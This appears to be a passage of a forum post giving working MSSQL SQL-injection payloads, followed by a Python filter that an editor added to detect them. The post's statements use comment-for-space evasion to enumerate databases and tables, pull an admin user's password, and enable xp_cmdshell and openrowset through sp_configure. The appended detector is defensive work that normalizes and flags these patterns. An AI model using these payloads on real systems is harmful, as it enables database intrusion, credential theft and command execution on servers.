CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

Statement for dumping table names. The somedb part is the database whose tables are to be listed; increment the red number 1.

CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

Statement for dumping a column: it extracts the password field from the table admin where user='icerover'.

CODE:
/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

MSSQL 2005 does not have xp_cmdshell enabled by default, and openrowset cannot be used either.
With sa privileges, they can be enabled like this.

Enable openrowset

CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

Enable xp_cmdshell

CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

OK, over~~ good night
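
A detection-side example added here, not part of the original post: a Python filter for web-server query strings that undoes URL encoding and the `/**/`-for-space substitution seen in the statements above, then flags catalog enumeration, the cast-compare pattern and sp_configure changes. The function names, rule names and sample strings are assumptions made for this example.

```python
import re
from urllib.parse import unquote, unquote_plus

# Rules keyed to constructs that appear in the statements quoted in the post.
RULES = {
    "catalog-enumeration": re.compile(r"\b(sysdatabases|sys\.all_objects)\b"),
    "error-based-cast": re.compile(r"select top \d+ .*cast\(.*\)\s*=\s*0"),
    "config-change": re.compile(
        r"\bsp_configure\b.*(xp_cmdshell|ad hoc distributed queries|show advanced options)"),
}

def decode(raw: str) -> str:
    """URL-decode a query string, following up to two extra layers of encoding."""
    text = unquote_plus(raw)
    for _ in range(2):
        nxt = unquote(text)
        if nxt == text:
            break
        text = nxt
    return text

def normalize(decoded: str) -> str:
    """Turn inline comments into spaces, drop [] quoting, fold case and whitespace."""
    text = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    text = text.replace("[", "").replace("]", "")
    return re.sub(r"\s+", " ", text).strip().lower()

def classify(raw_query: str) -> list[str]:
    """Return the names of all signals found in one raw query string."""
    decoded = decode(raw_query)
    hits = []
    if decoded.count("/**/") >= 3:  # empty comments used in place of spaces
        hits.append("comment-as-whitespace")
    norm = normalize(decoded)
    hits += [name for name, rx in RULES.items() if rx.search(norm)]
    return hits

# Constructed sample query strings (not taken from real logs).
SAMPLES = [
    "id=7",
    "q=how+to+cast+a+spell",
    "id=7/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))"
    "/**/from/**/[master].[dbo].[sysdatabases])%3d0--",
    "id=7;EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--",
    "id=7%253BEXEC%2520sp_configure%2520%2527xp_cmdshell%2527%252C1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s) or ["clean"], s[:60])
```

Matching runs on the normalized string, so the same rule fires whether the request uses spaces, `/**/`, bracket quoting or double URL encoding.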